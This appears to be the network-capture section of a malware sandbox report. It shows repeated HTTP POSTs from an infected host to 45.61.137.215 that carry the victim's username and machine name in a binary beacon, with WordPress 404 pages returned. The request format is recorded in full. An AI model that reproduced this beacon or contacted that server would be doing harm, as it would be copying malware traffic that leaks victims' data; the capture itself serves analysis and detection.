                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:45:47.941873074 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:45:47.941939116 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:45:47.941987991 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:45:47.942023039 CEST1236INData Raw: 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35 35 2c 32 30 36 2c 32 33 36 29 20 30 25 2c 72 67 62 28 31 35 32 2c 31 35 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64
                                            Data Ascii: near-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(13
                                            May 29, 2024 15:45:47.942058086 CEST328INData Raw: 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 2c 20 36 70 78 20 36 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74
                                            Data Ascii: ed: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}body .
                                            May 29, 2024 15:45:47.942112923 CEST1236INData Raw: 30 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 7b 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 7d 62 6f 64 79 20 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 20 3e 20 2a 7b 6d 61 72 67 69 6e 3a 20 30 3b 7d 3a 77 68 65 72 65 28
                                            Data Ascii: 0;}body .is-layout-grid{display: grid;}body .is-layout-grid > *{margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where
                                            May 29, 2024 15:45:47.942147017 CEST1236INData Raw: 64 2d 70 75 72 70 6c 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 62 6c 61 63
                                            Data Ascii: d-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            84192.168.2.94979945.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:48.086059093 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:48.091593981 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:50.576786995 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:48 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:50.576813936 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:45:50.576833963 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:45:50.576847076 CEST224INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener(
                                            May 29, 2024 15:45:50.576920986 CEST1236INData Raw: 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72
                                            Data Ascii: "DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.support
                                            May 29, 2024 15:45:50.576939106 CEST1236INData Raw: 70 65 6d 6f 6a 69 26 26 65 2e 74 77 65 6d 6f 6a 69 26 26 28 74 28 65 2e 74 77 65 6d 6f 6a 69 29 2c 74 28 65 2e 77 70 65 6d 6f 6a 69 29 29 29 7d 29 29 7d 28 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 29 2c 77 69 6e 64 6f 77 2e 5f 77 70 65 6d
                                            Data Ascii: pemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings);/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: no
                                            May 29, 2024 15:45:50.576955080 CEST448INData Raw: 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 72 65 64 3a 20 23 63 66 32 65 32 65 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77
                                            Data Ascii: -color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color
                                            May 29, 2024 15:45:50.576975107 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:50.576988935 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:45:50.577378988 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            85192.168.2.94980145.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:50.755707026 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:50.760795116 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:53.256736994 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:51 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:45:53.256757021 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:45:53.256851912 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:45:53.256863117 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:45:53.256874084 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:45:53.256886005 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:45:53.257040977 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:45:53.257054090 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:45:53.257064104 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:45:53.257142067 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            86192.168.2.94980245.61.137.21580
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:45:53.430974960 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:45:53.435920000 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:45:56.033720016 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:45:53 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
